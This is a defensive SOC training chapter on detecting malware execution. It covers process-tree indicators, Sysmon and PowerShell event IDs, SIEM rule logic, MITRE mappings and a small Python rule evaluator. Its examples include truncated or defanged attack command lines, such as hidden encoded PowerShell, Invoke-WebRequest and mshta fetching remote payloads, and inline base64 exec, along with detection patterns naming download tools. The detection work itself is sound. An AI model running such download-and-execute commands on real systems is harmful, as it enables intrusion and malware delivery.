Malware execution detection focuses on identifying when malicious code begins running on an endpoint, whether it is a binary, script, macro, DLL, or fileless technique.
In SOC operations, detecting malware execution early is critical because it prevents lateral movement, privilege escalation, and ransomware detonation.
This chapter explains malware execution in full-depth SOC style, including detection logic, behavioral patterns, log sources, EDR telemetry, SIEM rules, practical examples, and real attacker techniques.
What Malware Execution Looks Like
Malware executes through many methods:
- Executable files (.exe, .dll)
- Script engines (PowerShell, WMI, Bash, Python)
- Office macros
- Malicious installers
- Archive extraction (ZIP, RAR, ISO)
- LOLBins (rundll32, regsvr32, mshta, wmic)
- In-memory execution (Cobalt Strike, Meterpreter)
- Browser-based exploits
Malware rarely appears alone. It is part of a chain:
Initial Access → Execution → Persistence → C2 → Actions on Objectives
Detecting execution stops the kill chain early.
Key Indicators of Malware Execution
Malware execution usually shows one or more of these patterns.
Suspicious parent processes
- WINWORD.exe → powershell.exe
- excel.exe → cmd.exe
- chrome.exe → mshta.exe
- outlook.exe → wscript.exe
These are strong signs of phishing-based execution.
Abnormal file locations
Malware rarely runs from trusted directories.
Suspicious paths:
- %TEMP%
- %APPDATA%
- %PUBLIC%
- %PROGRAMDATA%
- /tmp/
- /var/tmp/
Example:
C:\Users\Public\script.exe
Encoded or obfuscated command lines
Examples:
powershell.exe -nop -w hidden -enc JAB...
wscript.exe //e:vbscript
python.exe -c "exec(__import__('base64')..."
Encoding hides the malicious behavior from casual inspection of the command line.
Unexpected network connections after execution
Examples:
- Outbound to unknown IP/TLD
- HTTPS connections with no SNI
- Beaconing every X seconds (fixed interval)
- Traffic to dynamic DNS domains
Example:
payload.exe → 104.22.113.51:443
DLL loading & side-loading
Suspicious usage:
rundll32.exe payload.dll,Start
A common malware technique.
Script-Powered execution
Malware often uses:
- PowerShell
- WMI
- JScript
- HTA
- Python
- Bash
Example:
powershell.exe Invoke-WebRequest -Uri http[:]//host/payload.exe
Detection Logic by Source
Below are the exact telemetry sources used in SOC investigations.
Windows Event Logs
Event ID 4688 (Process Creation)
Shows:
- Parent process
- Executable name
- Command line
Example detection logic:
- Parent = Word, Excel
- Child = PowerShell, cmd, rundll32
- Command line contains a download or an encoded payload
Sysmon
Event ID 1 (Process Creation)
Primary source for detecting malware execution.
Event ID 7 (Image Loaded)
Detects malicious DLL injection.
Event ID 11 (File Created)
Shows payload drop before execution.
Event ID 13 (Registry Write)
Detects persistence creation.
PowerShell Logs
Detect encoded or obfuscated commands:
- Event ID 4104 → script block logging
- Event ID 400, 403 → engine start
EDR Telemetry
EDR provides:
- Process tree
- Suspicious threads
- Memory injection alerts
- Behavior-based detections
- Network activity tied to processes
- Reputation alerts
EDR is the strongest source for detecting malware execution.
SIEM Detection Logic for Malware Execution
Here are real detection conditions used in SOC environments.
Rule: Office spawning PowerShell
ParentImage IN (WINWORD.exe, excel.exe, outlook.exe)
AND Image = powershell.exe
Rule: Encoded PowerShell Execution
Image = powershell.exe
AND CommandLine contains "-enc"
Rule: Suspicious Executable in User Directory
Image endswith .exe
AND ImagePath contains ("AppData","Temp","Public")
Rule: HTA-Based Malware Execution
ParentImage = chrome.exe
AND Image = mshta.exe
Rule: Script Engines Downloading Payloads
CommandLine contains ("Invoke-WebRequest","curl","wget")
Behavioral Techniques (MITRE ATT&CK)
Malware execution maps to:
- T1204 (User Execution)
- T1059 (Command and Scripting Interpreter)
- T1106 (Native API Execution)
- T1218 (Signed Binary Proxy Execution)
- T1047 (WMI Execution)
- T1055 (Process Injection)
Mapping logs to MITRE helps classify the attack stage.
Practical Examples
Example 1 — Phishing attachment triggers malware
WINWORD.exe
↳ powershell.exe -nop -w hidden -enc JAB...
↳ payload.exe
Detection:
- Parent-child mismatch
- Encoded command
- Payload execution
Example 2 — In-memory RAT execution
rundll32.exe → reflective DLL → beacon
Detection:
- DLL loaded from user directory
- Unbacked memory region
- Network beaconing
Example 3 — Macro launches script engine
excel.exe → wscript.exe → downloader.js → malware.exe
Detection:
- Wscript spawned by Excel
- JS script creation
- Network downloads
Example 4 — Browser exploit triggers mshta
chrome.exe → mshta.exe http[:]//malicious/hta
Detection:
- Execution of remote script
- Suspicious parent
- Unwanted outbound traffic
Example 5 — Python-based malware execution
python.exe -c "exec(base64.b64decode(...))"
Detection:
- Inline execution
- Encoded payload
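The five SIEM rules from the "SIEM Detection Logic" section, run over Practical Examples 1 and 4, as an added Python example that is not part of the original chapter: the records are constructed Sysmon Event ID 1 style dicts (the field names Image, ParentImage and CommandLine are Sysmon's; the paths and command lines are made up), and the full Image path stands in for the ImagePath field of the user-directory rule.

```python
import os

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe"}
USER_DIRS = ("appdata", "temp", "public")
DOWNLOAD_TOKENS = ("invoke-webrequest", "curl", "wget")

def _base(path):
    # Normalise a Windows or POSIX image path to its lowercase file name.
    return os.path.basename(path.replace("\\", "/")).lower()

def evaluate(event):
    """Return the names of the chapter's SIEM rules that fire for one Sysmon
    Event ID 1 style record (Image, ParentImage, CommandLine); the full Image
    path is used where the chapter's rule text says ImagePath."""
    image = _base(event["Image"])
    parent = _base(event.get("ParentImage", ""))
    cmd = event.get("CommandLine", "").lower()
    path = event["Image"].lower()
    hits = []
    if parent in OFFICE_PARENTS and image == "powershell.exe":
        hits.append("office_spawning_powershell")
    if image == "powershell.exe" and "-enc" in cmd:
        hits.append("encoded_powershell")
    if image.endswith(".exe") and any(d in path for d in USER_DIRS):
        hits.append("exe_in_user_directory")
    if parent == "chrome.exe" and image == "mshta.exe":
        hits.append("hta_from_browser")
    if any(t in cmd for t in DOWNLOAD_TOKENS):
        hits.append("script_engine_download")
    return hits

# Constructed events modelled on Practical Examples 1 and 4, plus one benign
# process; all paths and command lines are made up for this example.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Microsoft Office\WINWORD.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc JAB..."},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Users\Public\payload.exe",
     "CommandLine": "payload.exe"},
    {"ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http[:]//malicious/hta"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe"},
]

def triage(events):
    """Keep only events that fired at least one rule, keyed by command line."""
    return {e["CommandLine"]: evaluate(e) for e in events if evaluate(e)}
```

Substring matches such as "temp" also hit legitimate paths like a Templates folder, so tune the path rule against your own baseline before alerting on it.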
Incident Response Actions After Malware Execution
- Isolate host
- Kill malicious processes
- Collect process tree and memory snapshot
- Extract IOCs
- Check for persistence modification
- Block C2 indicators
- Hunt for lateral movement
- Perform full RCA
Intel Dump
- Malware execution is detected by analyzing process creation, command lines, parents, children, and network behavior.
- Key telemetry: Sysmon, 4688 logs, PowerShell logs, EDR data, and registry activity.
- Suspicious indicators include encoded PowerShell, LOLBins, unexpected parent processes, and execution in user directories.
- SIEM rules detect execution based on parent-child relationships, command patterns, and download activity.
- EDR behavior analytics catch in-memory and fileless attacks.
- Early detection of execution prevents ransomware, C2 establishment, and lateral movement.